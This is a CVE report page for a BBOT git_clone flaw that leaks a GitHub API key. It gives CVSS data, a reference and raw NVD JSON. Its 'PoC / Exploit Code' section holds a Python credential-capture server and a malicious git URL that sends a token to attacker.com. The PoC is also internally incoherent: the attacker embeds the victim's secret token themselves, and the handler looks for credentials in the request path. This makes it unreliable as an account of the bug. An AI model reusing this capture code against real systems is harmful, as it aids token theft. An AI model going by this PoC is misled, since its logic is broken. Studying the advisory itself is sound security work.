Security Vulnerability Report
CVE-2025-10281 CVSS 4.7 MEDIUM

CVE-2025-10281

Published: 2025-10-09 16:15:43
Last Modified: 2026-04-15 00:35:42

Description

BBOT's git_clone module could be abused to disclose a GitHub API key to an attacker-controlled server via a maliciously formatted git URL.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

All affected versions of BBOT's git_clone module (upgrading to the latest fixed version is recommended).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10281 - BBOT git_clone Module GitHub API Key Disclosure PoC
# Attacker sets up a listener to capture leaked credentials

# Step 1: Set up an attacker-controlled server to log incoming requests
# Using a simple netcat listener or HTTP server
import http.server
import socketserver


class CredentialCaptureHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the full URL including any embedded credentials
        print(f"[CAPTURED] Path: {self.path}")
        print(f"[CAPTURED] Headers: {self.headers}")
        # Extract credentials from URL (format: https://<credentials>@<host>/...)
        if "@" in self.path:
            creds = self.path.split("@")[0].lstrip("/")
            print(f"[LEAKED CREDENTIALS] {creds}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"OK")

    def log_message(self, format, *args):
        pass  # Suppress default logging


# Step 2: Attacker places a malicious git URL in a location BBOT will crawl
# The malicious URL redirects or points to attacker server while
# containing the GitHub API token
# <GITHUB_TOKEN> is a placeholder; the token value is not preserved on this page
malicious_url = "https://x-access-token:<GITHUB_TOKEN>@attacker.com/fake-repo.git"

# Step 3: When BBOT's git_clone module processes this URL, it will
# send the request to attacker.com with the embedded token
# The attacker captures the token in their server logs
print(f"[*] Malicious URL: {malicious_url}")
print("[*] Starting credential capture server on port 80...")

# Uncomment to start the capture server
# with socketserver.TCPServer(("", 80), CredentialCaptureHandler) as httpd:
#     httpd.serve_forever()
```

References

https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10281", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:42.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BBOT's git_clone module could be abused to disclose a GitHub API key to an attacker controlled server with a malicious formatted git URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper", "source": "[email protected]"}]}}